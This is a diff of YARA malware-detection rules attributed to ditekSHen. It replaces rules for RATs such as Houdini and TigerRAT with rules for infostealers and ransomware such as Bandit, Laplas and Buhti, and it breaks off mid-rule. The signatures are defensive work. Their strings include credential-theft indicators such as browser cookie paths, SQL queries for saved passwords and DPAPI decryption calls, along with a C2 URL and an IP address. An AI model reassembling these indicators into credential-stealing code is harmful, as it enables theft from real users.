"\\44CALIBER" ascii + $s2 = "Ethernet()" fullword wide + $s3 = ":spy: NEW LOG FROM" wide + $s4 = ":eye: IP:" wide + $s5 = ":file_folder: Grabbed Files" wide + $s6 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii + $s7 = "$3b0e2d3d-3d66-42bb-8f9c-d6e188f359ae" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ( all of ($x*) or (1 of ($x*) and 3 of ($s*)) or 5 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Scoutelite : FILE +rule DITEKSHEN_MALWARE_Win_Lockdown : FILE { meta: - description = "Detects ScoutElite" + description = "Detects Lockdown / cantopen ransomware" author = "ditekSHen" - id = "989f558b-f84c-5f64-b85d-618d83f96782" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/back-in-2017" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11458-L11531" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "935bd891a9b68cb6ddad86db843de624f3a7ec0824f2b4c6ff0da56422b79668" + id = "793df99d-016a-5f96-9ff9-76d3f08e0dd2" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9463-L9476" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a9bc2f514730703f3edf78a61f1bc357eee12b3289fc7491197c3b885286ca7e" score = 75 - quality = 50 + quality = 73 tags = "FILE" strings: - $cmd1 = "command=scote_ping" fullword ascii - $cmd2 = "command=scote_info_ipconfig" fullword ascii - $cmd3 = "command=scote_info_systeminfo" fullword ascii - $cmd4 = "command=scote_connection|hwid=" fullword ascii - $cmd5 = "command=ping" fullword wide - $cmd6 = "command=screen_capture_init" fullword wide - $cmd7 = "command=screen_capture" fullword wide - $cmd8 = "command=silence_screenshot" fullword wide - $cmd9 = "command=silence_keylogger" fullword wide - $cmd10 = "command=silence_password" fullword wide - $cmd11 = "command=screen_thumb" fullword wide - $cmd12 = "command=filemanager_upload_tcp" fullword wide - $cmd13 = "command=filemanager_download" fullword wide - $cmd14 = "command=filemanager_init" fullword wide - $cmd15 = "command=filemanager_root" fullword wide - $cmd16 = "command=filemanager_folder_filemanager_file" fullword wide - $cmd17 = "command=filemanager_thumb" fullword wide - $cmd18 = "command=keylogger_init" fullword wide - $cmd19 = "command=keylogger_file" fullword wide - $cmd20 = "command=password_firefox" fullword wide - $cmd21 = "command=password_opera" fullword wide - $cmd22 = "command=password_chrome" fullword wide - $cmd23 = "command=password_all" fullword wide - $cmd24 = "command=password_init" fullword wide - $cmd25 = "command=misc_init" fullword wide - $cmd26 = "command=misc_process" fullword wide - $cmd27 = "command=misc_cmd" fullword wide - $cmd28 = "command=new_rcs" fullword wide - $cmd29 = "command=microphone_capture" fullword wide - $cmd30 = "command=microphone_capture_init" fullword wide - $cmd31 = "command=rvmedia_capture_init" fullword wide - $cmd32 = "command=rvmedia_list" fullword wide - $cmd33 = "command=rvmedia_resolution" fullword wide - $cmd34 = "command=webcam_capture_init" fullword wide - $cmd35 = "command=webcam_list" fullword wide - $cmd36 = "command=webcam_resolution" fullword wide - $cmd37 = "command=webcam_capture" fullword wide - $gcmd1 = "filemanager_download_ftp" fullword wide - $gcmd2 = "download_file_ftp" fullword wide - $gcmd3 = "filemanager_upload_http" fullword wide - $gcmd4 = "upload_file_http" fullword wide - $gcmd5 = "upload_url" fullword wide - $gcmd6 = "filemanager_delete" fullword wide - $gcmd7 = "filemanager_execute_file" fullword wide - $gcmd8 = /(microphone|webcam|rvmedia|keylogger|password|screen|filemanager)_(host|port|guid)/ nocase - $confs1 = "[nick_name]" fullword ascii - $confe1 = "[/nick_name]" fullword ascii wide - $confs2 = "[install_name]" fullword ascii wide - $confe2 = "[/install_name]" fullword ascii wide - $confs3 = "[install_folder]" fullword ascii wide - $confe3 = "[/install_folder]" fullword ascii wide - $confs4 = "[reg_startup]" fullword ascii wide - $confe4 = "[/reg_startup]" fullword ascii wide - $confs5 = "[folder_startup]" fullword ascii wide - $confe5 = "[/folder_startup]" fullword ascii wide - $confs6 = "[task_startup]" fullword ascii wide - $confe6 = "[/task_startup]" fullword ascii wide - $confs7 = "[injection]" fullword ascii wide - $confe7 = "[/injection]" fullword ascii wide - $confs8 = "[injection_process]" fullword ascii wide - $confe8 = "[/injection_process]" fullword ascii wide - $confs9 = "[connection]" fullword ascii wide - $confe9 = "[/connection]" fullword ascii wide + $s1 = "BgIAAACkAABSU0E" wide + $s2 = ".cantopen" fullword wide + $s3 = "\\HELP_DECRYPT_YOUR_FILES.txt" wide + $s4 = "SALT" fullword wide + $s5 = "$4e677664-9a63-458e-a365-deb792509557" fullword ascii + $s6 = "CreateEncryptor" fullword ascii condition: - ( uint16(0)==0x5a4d and (2 of ($cmd*) or 7 of ($gcmd*) or (2 of ($confs*) and 2 of ($confe*)) or (pe.exports("__elite") and 2 of them ))) or (15 of them ) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Scouteliteps +rule DITEKSHEN_MALWARE_Win_Unamedstealer : FILE { meta: - description = "Detects actor PowerShell tool designed to steal browsers session cookie and passwords on-disk and in-memory" - author = "ditekshen" - id = "d2c04d55-9bf7-54f5-8053-835fa60f19cb" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/back-in-2017" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11534-L11569" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9b1047b8b485fcfa29225f53674050703d32498cfa99654c8ac5f8bfac29878e" + description = "Detects unknown infostealer. Observed as 2nd stage and injects into .NET AppLaunch.exe" + author = "ditekSHen" + id = "cb3d575b-3d53-5b89-abc1-3b3857ec9f46" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9478-L9494" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "84f4ac7489a0d522763f69ce55f816642a8511dc4b9698ce47c983020a2b7bea" score = 75 - quality = 37 - tags = "" + quality = 75 + tags = "FILE" strings: - $cnc1 = "http://beginpassport.com" ascii wide nocase - $cnc2 = "f_dump.php" ascii wide nocase - $cnc3 = "c_dump.php" ascii wide nocase - $cnc4 = "o_dump.php" ascii wide nocase - $db1 = "\\Google\\Chrome\\User Data\\Default\\Cookies" ascii wide nocase - $db2 = "\\Mozilla\\Firefox\\Profiles\\*.default" ascii wide nocase - $db3 = "\\Opera Software\\Opera Stable\\Cookies" ascii wide nocase - $db4 = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default" ascii nocase - $db5 = "$($env:APPDATA)\\Mozilla\\Firefox\\Profiles\\*.default" ascii nocase - $db6 = "$($env:APPDATA)\\Opera Software\\Opera Stable" ascii nocase - $cond1 = "SSID" ascii wide - $cond2 = "MSPAuth" ascii wide - $cond3 = "\"'T'\"" ascii wide - $cond4 = "SNS_AA" ascii wide - $cond5 = "X-APPLE-WEBAUTH-TOKEN" ascii wide - $sql1 = "SELECT * FROM 'cookies' WHERE host_key LIKE $" ascii wide nocase - $sql2 = "SELECT * FROM 'moz_cookies' WHERE host LIKE $" ascii wide nocase - $sql3 = "SELECT origin_url, username_value ,password_value FROM 'logins'" ascii nocase - $def1 = "Add-Type -AssemblyName System.Security" ascii wide nocase - $def2 = "System.Security.SecureString" ascii wide nocase - $def3 = "ConvertFrom-SecureString" ascii wide nocase - $def4 = "[System.Security.Cryptography.ProtectedData]::Unprotect(" ascii wide nocase - $def5 = "[Security.Cryptography.DataProtectionScope]::LocalMachine" ascii wide nocase - $def6 = "[Security.Cryptography.DataProtectionScope]::CurrentUser" ascii wide nocase - $def7 = "System.Data.SQLite.SQLiteConnection" ascii wide nocase - $def8 = "[Environment]::OSVersion.ToString().Replace(\"Microsoft Windows \"," ascii wide nocase - $def9 = "Start-Sleep" ascii wide nocase + $s1 = "HideMelt" fullword ascii + $s2 = ".Implant" ascii + $s3 = "SetUseragent" fullword ascii + $s4 = "SendReport" fullword ascii + $s5 = "cookiesList" fullword ascii + $s6 = "WriteAppsList" fullword ascii + $s7 = "Timeout /T 2 /Nobreak" fullword wide + $s8 = "Directory not exists" wide + $s9 = "### {0} ### ({1})" wide condition: - (1 of ($cnc*) and any of ($db*) and any of ($cond*) and any of ($sql*) and 7 of ($def*)) or ( all of them ) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Houdiniconfig : FILE +rule DITEKSHEN_MALWARE_Win_Zxshell_Loader : FILE { meta: - description = "Detects Houdini Trojan configurations" - author = "ditekshen" - id = "e4f974fe-731e-55a8-aa5f-068a1e62f54d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/back-in-2017" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11600-L11616" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "70a67c9a91d2f82184f1d7a5ea51de911a054dd4e38e2cc36f495ed59219afab" + description = "Detects ZXShell kernel driver loader" + author = "ditekSHen" + id = "c55c718b-6af3-5d3b-aa1c-369319fca603" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9496-L9544" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b20350af231e0c329423c71d8f099305ed447d2ffcb7a533b7531dc9f5357b93" score = 75 - quality = 75 + quality = 57 tags = "FILE" + hash1 = "a6020794bd6749e0765966cd65ca6d5511581f47cc2b38e41cb1e7fddaa0b221" strings: - $s1 = "install_name=" - $s2 = "nick_name=" - $s3 = "install_folder=" - $s4 = "reg_startup=" - $s5 = "startup_folder_startup=" - $s6 = "task_startup=" - $s7 = "injection=" - $s8 = "injection_process" + $s1 = "KillAvpProcess" ascii wide nocase + $s2 = "ProtectDllFile" ascii wide nocase + $s3 = "LoadSys" ascii wide nocase + $s4 = "CallDriver" ascii wide nocase + $s5 = "DoRVA" fullword ascii wide + $s6 = "TdiProxy" ascii + $s7 = "res.ini" fullword ascii + $s8 = "res.dat" fullword ascii + $s9 = "google64.p" fullword ascii + $s10 = "google32.p" fullword ascii + $s11 = "OneSelfKey" fullword ascii + $x1 = "antiscan" ascii + $x2 = "removeprocessnotify" ascii + $x3 = "setprocessnotify" ascii + $x4 = "antiantigp" ascii + $x5 = "hideproc" ascii + $x6 = "hidekey" ascii + $x7 = "hidefile" ascii + $x8 = "sc create %s binpath= \"%%SystemRoot%%\\System32\\svchost.exe -k %s\" type= share start= auto" fullword ascii + $m1 = "St4rtServ1ce" ascii + $m2 = "ch3ck dr1ver failed" ascii + $m3 = "L0ad dr1ver failed" ascii + $m4 = "Write Dr1ver Failed" ascii + $m5 = "over writed succ3ssfully" ascii + $m6 = "can k1ll the pr0cessId" ascii condition: - ( uint16(0)==0x5a4d and 5 of them ) or ( all of them ) + uint16(0)==0x5a4d and (3 of ($m*) or 5 of ($s*) or 5 of ($x*) or (3 of ($s*) and 3 of ($x*)) or (2 of ($s*) and 1 of ($x*) and 1 of ($m*)) or (pe.exports("KillAvpProcess") and pe.exports("ProtectDllFile") and pe.exports("LoadSys")) or (3 of them and (pe.exports("KillAvpProcess") or pe.exports("ProtectDllFile") or pe.exports("LoadSys") or pe.exports("CallDriver") or pe.exports("DoRVA")))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Houdini : FILE +rule DITEKSHEN_MALWARE_Win_Bandit : FILE { meta: - description = "Detects the raw binary of the Houdini Trojan Delphi variant" - author = "ditekshen" - id = "79681ca3-b956-52d4-81b8-b3bd4c86872a" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/back-in-2017" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11618-L11689" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0580d2525d9d989f98e815dd98b9258724b6e31f058092132c0fbd67cbc5c63c" + description = "Detects Bandit Infostealer" + author = "ditekSHen" + id = "06866232-bd40-5bbc-9f08-3892193b5f36" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9546-L9582" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e557f5a928b5da90f3ec878d6d8615a2d8b5f33e97954cd3278044f76b543386" score = 75 - quality = 46 + quality = 57 tags = "FILE" strings: - $hc = "houdiniclient" ascii wide nocase - $mk1 = "keylogger_thread" fullword ascii - $mk2 = "keyloger_host" fullword ascii - $mk3 = "keylogger_port" fullword ascii - $mk4 = "keylogger_thread" fullword ascii - $mk5 = "keylogger_init" fullword wide - $mk6 = "keylogger_stop" fullword wide - $mk7 = "keylogger_offline" fullword wide - $mk8 = "silence_keylogger" fullword wide - $ms1 = "screenshot_thread" fullword ascii - $ms2 = "screen_host" fullword ascii - $ms3 = "screen_port" fullword ascii - $ms4 = "screenshot_init" fullword wide - $ms5 = "screenshot_start" fullword wide - $ms6 = "screenshot_stop" fullword wide - $ms7 = "screen_thumb" fullword wide - $ms8 = "silence_screenshot" fullword wide - $mf1 = "file_manager_init" fullword wide - $mf2 = "file_manager_root" fullword wide - $mf3 = "file_manager_faf" fullword wide - $mf4 = "file_manager_download" fullword wide - $mf5 = "file_manager_upload" fullword wide - $mf6 = "file_manager_stop" fullword wide - $mf7 = "file_manager_delete_folder" fullword wide - $mf8 = "file_manager_rename_folder" fullword wide - $mf9 = "file_manager_rename_file" fullword wide - $mf10 = "file_manager_delete_file" fullword wide - $mf11 = "file_manager_execute_file" fullword wide - $mf12 = "file_manager_thumb" fullword wide - $mf13 = "file_manager_upload_http" fullword wide - $mf14 = "file_manager_upload_tcp" fullword wide - $mf15 = "upload_file_tcp" fullword wide - $mf16 = "download_file_tcp" fullword wide - $mf17 = "upload_file_http" fullword wide - $mf18 = "filemanager_host" fullword ascii - $mf19 = "filemanager_port" fullword ascii - $mf20 = "filemanager_thread" fullword ascii - $mp1 = "password_value" fullword wide - $mp2 = "password_init" fullword wide - $mp3 = "password_stop" fullword wide - $mp4 = "password_firefox" fullword wide - $mp5 = "password_chrome" fullword wide - $mp6 = "password_all" fullword wide - $mp7 = "password_host" fullword ascii - $mp8 = "password_port" fullword ascii - $mp9 = "password_thread" fullword ascii - $mm1 = "misc_init" fullword wide - $mm2 = "misc_stop" fullword wide - $mm3 = "misc_process_list" fullword wide - $mm4 = "misc_module_list" fullword wide - $mm5 = "misc_process_terminate" fullword wide - $mm6 = "misc_host" fullword ascii - $mm7 = "misc_port" fullword ascii - $mm8 = "misc_thread" fullword ascii - $pl1 = "plugin_file_init" fullword wide - $pl2 = "plugin_url_init" fullword wide - $pl3 = "plugin_stop" fullword wide + $x1 = "@Banditshopbot" ascii + $x2 = "BANDIT STEALER" ascii + $x3 = "Banditstealer" ascii + $n1 = "bandit/browsers." ascii + $n2 = "bandit/crypto." ascii + $n3 = "bandit/decrypt." ascii + $n4 = "bandit/messenger." ascii + $n5 = "bandit/userdata." ascii + $n6 = "bandit/utils." ascii + $f1 = "main.sendZipToTelegram" fullword ascii + $f2 = "main.killProcessHoldingFileHandle" fullword ascii + $f3 = "main.killProcessByName" fullword ascii + $f4 = "main.killProcessesHoldingFile" fullword ascii + $f5 = "main.deleteDir" fullword ascii + $f6 = "main.deleteUserDataDirs" fullword ascii + $path = /bandit\/(browsers|common|crypto|messenger|userdata|utils)\/(browsers|common|crypto|messenger|userdata|utils)\.go/ ascii + $m1 = "banditbot" ascii wide nocase + $m2 = "blackListedIPS = [" ascii wide nocase + $m3 = "blackListedPCNames = [" ascii wide nocase + $m4 = "blackListedMacs = [" ascii wide nocase + $m5 = "blacklisted_hwids = [" ascii wide nocase + $m6 = "blacklisted_users = [" ascii wide nocase + $m7 = "blacklisted_processes = [" ascii wide nocase + $s1 = "User-AgentVirtualBox" ascii + $s2 = "%s%sBinanceChainWallet" ascii + $s3 = "coinbaseWalletcontent-lengthdata" ascii + $s4 = "coinbaseWalletExtensioncommand" ascii + $s5 = "\\s+pid:\\s+(\\d+)\\s+" ascii + $s6 = "/user:Administrator" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (2 of ($x*) or 4 of ($n*) or 5 of ($f*) or ($path and (1 of ($n*) or 1 of ($f*))) or (1 of ($x*) and (1 of ($n*) or 1 of ($f2*))) or 6 of ($m*) or ( all of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Lighthand : FILE +rule DITEKSHEN_MALWARE_Win_Laplas : FILE { meta: - description = "Detects LightHand" - author = "ditekshen" - id = "2b644dfb-f09a-50a5-8260-7b7022bce1f4" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects LapLas Infostealer" + author = "ditekSHen" + id = "bf2b0183-2b21-535a-896c-250fa448d090" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11691-L11718" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4f06467a522b786045839e6b22b888cecc554b0f63cc20dc43dc0f8ec80f5654" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9584-L9612" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e4a1f39a539782118db9c4ab89d03e359420397ef970165389cc79e7ea0952b3" score = 75 - quality = 75 + quality = 50 tags = "FILE" + clamav_sig1 = "MALWARE.Win.LapLas-DotNET" + clamav_sig2 = "MALWARE.Win.LapLas-GoLang" strings: - $x1 = "27.102." ascii - $x2 = "109.248.150.179" fullword ascii - $s1 = /Hello (Client|Server)/ fullword ascii - $s2 = "%s|%s|%s|%s|%s|%s|" fullword wide - $s3 = "%s\\cmd.exe" fullword wide - $s4 = "Remote PC" fullword wide - $s5 = { 2e 62 61 74 [3-4] 3a 4c 31 0d 0a 64 65 6c - 20 2f 46 20 22 25 73 22 0d 0a 69 66 20 65 78 69 - 73 74 20 22 25 73 22 20 67 6f 74 6f 20 4c 31 0d - 0a 64 65 6c 20 2f 46 20 22 25 73 22 0d 0a 00 00 - 6f 70 65 6e } - $s6 = { 25 00 2e 00 32 00 66 00 47 00 42 00 00 00 00 00 - 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 - 0a 00 00 00 00 00 00 00 5c 00 2a 00 2e 00 2a 00 - 00 00 00 00 0a 00 00 00 2e 00 00 00 2e 00 2e 00 - 00 00 00 00 00 00 00 00 46 00 6f 00 6c 00 64 00 - 65 00 72 00 00 00 00 00 25 00 73 00 5c 00 25 00 - 73 00 00 00 00 00 00 00 25 00 64 00 42 00 00 00 - 25 00 2e 00 31 00 66 00 4b 00 42 00 00 00 00 00 - 25 00 2e 00 31 00 66 00 4d 00 42 } + $c1 = "/bot/" ascii + $c2 = "key=" ascii + $f1 = "main.isRunning" fullword ascii + $f2 = "main.writePid" fullword ascii + $f3 = "main.isStartupEnabled" fullword ascii + $f4 = "main.enableStartup" fullword ascii + $f5 = "main.waitOpenClipboard" fullword ascii + $f6 = "main.clipboardWrite" fullword ascii + $f7 = "main.setOnline" fullword ascii + $f8 = "main.getRegex" fullword ascii + $v2_1 = "{0}/bot/{1}?{2}" wide + $v2_2 = /\{0\}\\\{1\}\.(exe|pid)/ wide + $v2_3 = "schtasks /create /tn" wide + $v2_4 = "SetOnline" fullword ascii + $v2_5 = "IsAutoRunInstance" fullword ascii + $v2_6 = "GetNewAddress" fullword ascii + $v2_7 = "RefreshRegex" fullword ascii condition: - uint16(0)==0x5a4d and ((5 of ($s*)) or (1 of ($x*) and 3 of ($s*))) + uint16(0)==0x5a4d and (( all of ($c*) and 5 of ($f*)) or (1 of ($c*) and 7 of ($f*)) or (6 of ($v2*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Validalpha : FILE +rule DITEKSHEN_MALWARE_Win_Mystic : FILE { meta: - description = "Detects ValidApha / BlackRAT" - author = "ditekshen" - id = "3162eb5f-6e2d-598a-b199-22b70ec8a773" - date = "2024-09-06" - modified = "2024-09-06" + description = "Hunt for Mystic Infostealer" + author = "ditekSHen" + id = "959eceab-0a2c-5361-b8f4-6739033ffae5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11720-L11736" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "54d170076d1b32cee6f6252d40548acc7e23b467d692c59d6146a8aadf431211" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9614-L9628" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "26e0b85141df818d70124c0b19b5b6a05ac24ae679724d7a8ad94415a6462d17" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "RAT/Black/" ascii - $x2 = "RAT/Black/Client_Go/" ascii - $s1 = "main.RunTask" fullword ascii - $s2 = "main.CmdShell" fullword ascii - $s3 = "main.SelfDelete" fullword ascii - $s4 = "main.RecvPacket" fullword ascii - $s5 = "main.FileDownload" fullword ascii - $s6 = "main.CaptureScreen" fullword ascii - $s7 = "main.PeekNamedPipe" fullword ascii + $s1 = "LaStFiLe:)" ascii wide + $s2 = "LaStPrOcEsS:)" ascii wide + $s3 = "credit_cards" ascii wide + $s4 = "number_of_processors" ascii wide + $s5 = "computername" ascii wide + $p1 = "G:\\Projects\\Python\\morpher\\" ascii wide + $p2 = /G:\\Projects\\stealer\\.{15}\\Release\\.{5,25}\.pdb/ ascii wide condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 2 of ($s*)) or (6 of ($s*))) + ( uint16(0)==0x5a4d and (4 of ($s*) or (1 of ($p*) and 3 of ($s*)))) or ( all of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Tigerrat : FILE +rule DITEKSHEN_MALWARE_Linux_Buhti : FILE { meta: - description = "Detects TigerRAT" - author = "ditekshen" - id = "37192fc8-1932-5f33-994a-bb319b131c58" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Buhti Ransomware" + author = "ditekSHen" + id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11738-L11756" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "38a238339db7e7f573e0c7362af5a08654a9e134f902c0ecae441250a0364c64" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9630-L9643" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561" score = 75 quality = 75 tags = "FILE" strings: - $m0 = ".?AVCryptorRC4@@" fullword ascii - $m1 = ".?AVModuleShell@@" fullword ascii - $m2 = ".?AVModuleKeyLogger@@" fullword ascii - $m3 = ".?AVModuleSocksTunnel@@" fullword ascii - $m4 = ".?AVModuleScreenCapture@@" fullword ascii - $m5 = ".?AVModulePortForwarder@@" fullword ascii - $s1 = "\\x9891-009942-xnopcopie.dat" fullword wide - $s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii - $s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii - $s4 = "~KPTEMP" fullword wide - $s5 = "del \"%s\"%s \"%s\" goto " ascii + $x1 = "buhtiRansom" ascii + $x2 = "://satoshidisk.com/pay/" ascii + $s1 = "main.encrypt_file" fullword ascii + $s2 = "/path/to/be/encrypted" ascii + $s3 = "Restore-My-Files.txt" ascii + $s4 = ".buhti390625" ascii condition: - uint16(0)==0x5a4d and (( all of ($s*)) or (5 of ($m*)) or (3 of ($m*) and 2 of ($s*)) or (5 of them )) + uint16(0)==0x457f and ( all of ($x*) or (1 of ($x*) and 3 of ($s*)) or 5 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ktlvdoor : FILE +rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE { meta: - description = "Detects KTLVdoor" - author = "ditekshen" - id = "f63ebd05-fb4b-50fb-887b-dacd379594a4" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects CommonMagic and Modules" + author = "ditekSHen" + id = "cbebe334-9b66-5931-8f92-25d080f7fd6a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11758-L11791" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3ced9b558c7e17acd015cd2c9dd0c5d024bf9c31c7f2e7c9b7b937124109cf8b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9645-L9660" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "/cmd/acc/agent_acc" ascii - $s2 = "main.DLLWMain" ascii - $s3 = "main.checkSilent" ascii - $h1 = ".handleInteractiveShell" ascii - $h2 = ".handleNetstat" ascii - $h3 = ".handleProcess" ascii - $h4 = ".handleRefreshHostInfo" ascii - $h5 = ".handleTimestomp" ascii - $h6 = ".handleSoInject" ascii - $h7 = ".HandleRegInfo" ascii - $h8 = ".handlePortscan" ascii - $h9 = ".handleReflectDllInject" ascii - $h10 = ".handleFileDownload" ascii - $f1 = ".RdpWithNTLM." ascii - $f2 = ".FingerPrintOs." ascii - $f3 = ".ScanWMI." ascii - $f4 = ".ScanWinRM." ascii - $f5 = ".ScanWeb." ascii - $f6 = ".ScanSmb2." ascii - $f7 = ".ScanRDP." ascii - $f8 = ".ScanPing." ascii - $f9 = ".ScanOxid." ascii - $f10 = ".ScanMssql." ascii - $f11 = ".ScanBanner." ascii - $fr1 = /\.proxy[CS]2[CS](TC|UD)P/ ascii - $fr2 = /\.Scan(WMI|WinRM|Web|Smb2|RDP|Ping|Oxid|Mssql|Banner)\./ ascii + $p1 = "\\\\.\\pipe\\PipeMd" wide + $p2 = "\\\\.\\pipe\\PipeCrDtMd" wide + $p3 = "\\\\.\\pipe\\PipeDtMd" wide + $s1 = "graph.microsoft.com" fullword wide + $s2 = "CreateNamedPipe" ascii + $s3 = "\\CommonCommand\\" wide + $ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide + $ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide condition: - ( uint16(0)==0x5a4d or uint16(0)==0x457f) and ((6 of ($h*)) or (12 of ($f*)) or (2 of ($h*) and 4 of ($f*)) or (1 of ($s*) and (4 of ($h*) or 4 of ($f*))) or (13 of them )) + uint16(0)==0x5a4d and (2 of ($p*) and 1 of ($s*)) or (1 of ($ua*) and 1 of ($s*) and 1 of ($p*)) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Meshagent : FILE +rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE { meta: - description = "Detects MeshAgent. Review RMM Inventory" + description = "Detects GreetingGhoul Cryptocurrency Infostealer" author = "ditekSHen" - id = "3d0baa87-22c9-569d-ba84-37ccaac577b8" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = 